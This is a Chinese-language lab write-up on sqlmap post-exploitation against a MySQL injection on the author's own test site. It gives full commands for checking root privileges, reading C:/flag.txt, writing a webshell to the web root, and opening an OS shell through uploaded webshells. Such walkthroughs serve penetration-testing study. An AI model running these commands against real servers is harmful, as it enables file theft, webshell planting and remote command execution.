SQLMAP之高权限用户操作

0x00 SQLMAP

这个SQLMAP还是有点东西的，虽然在很多时候没有自己写的小东西好使，但是有些功能确实做的不错，好多东西还没精力去研究，看到了就记一笔。

---

0x01 检查当前用户

用自己的靶场做的测试。

python sqlmap.py -u "http://www.baynk.com/bvwa/vul/sqli/sqli-union-get-num.php?id=1" --os=windows --dbms=mysql --tech=u -p id

确实存在注入，查看用户。

python sqlmap.py -u "http://www.baynk.com/bvwa/vul/sqli/sqli-union-get-num.php?id=1" --os=windows --dbms=mysql --tech=u -p id --current-user

可以看到是root权限，也可以用--privileges查看权限。

那接下来先来读取文件。

---

0x02 读取文件

我的C盘下有个文件C:/flag.txt，可以使用--file-read来进行读取。

python sqlmap.py -u "http://www.baynk.com/bvwa/vul/sqli/sqli-union-get-num.php?id=1" --os=windows --dbms=mysql --tech=u -p id -v 3 --file-read="c:/flag.txt"

使用-v 3打开payload信息。

可以看到用的是load_file()函数，如果secure_file_priv设置正确，即使有用户权限也是无法读取成功的。

运行结束后，查看此文件就可以看到c:/flag.txt的信息了。

---

0x03 写入文件

写入文件，是将本地的文件，上传到服务器上，一般上传webshell比较好用，同时也得知道服务器的物理路径才行，服务器物理路径可以通过敏感文件如phpinfo，前端代码审计，页面报错，数据库报错等信息找到。

这里需要用到两个参数--file-write和--file-dest，前者指定本地文件，后者指定服务器物理路径。

不小心爆出错误了hhh

python sqlmap.py -u "http://www.baynk.com/bvwa/vul/sqli/sqli-union-get-num.php?id=1" --os=windows --dbms=mysql --tech=u -p id -v 3 --file-write="y:/shell/test.php" --file-dest="D:\Programs\PHPStudy\WWW\bvwa\test100.php"

这里看到，用的是into dumpfile，我还以为是into outfile呢，写入以后直接去访问文件就好了。

OK，成功执行。

---

0x04 命令执行

这里可以使用--os-commad或者--os-shell，前者单一命令，后者是交互式shell。用法是一样的，这是用--os-shell举例。

这里sqlmap不是直接执行命令的，是通过上传webshell的方式来进行完成，先上传小马，再上传一句话。

这里选php语言，然后就获取到了物理路径的信息。。。

这里是真的有点神奇。。。没看出来怎么获取到的。接着自动上传文件

然后自动测试木马

访问成功后，就有shell了，注意，如果这里探测到的目录没有权限，则需要手动自己输入物理路径。

命令可以正常执行。按q或者x都可以退出，退出之前去看下上传的马好了。

应该是xpe和swr结尾的阿。。还出两个来了，一个一个看。先看小马tmpuaxpe.php

再看一句话tmpbaswr.php

提示没变量，传cmd就行了。

效果和之前是一样的，然后又去看下另外两个，也是一个小马和一句话，可能是之前用的没注意吧。。
按q退出。

删除了我刚刚创建的两个，，看来这两个真的是多余的，留下来好了-。-

这里除了用os-shell还可以用其它的--os参数，不过需要第三方组件的支持，比如超好用的meterpreter。。。有需要再测试吧。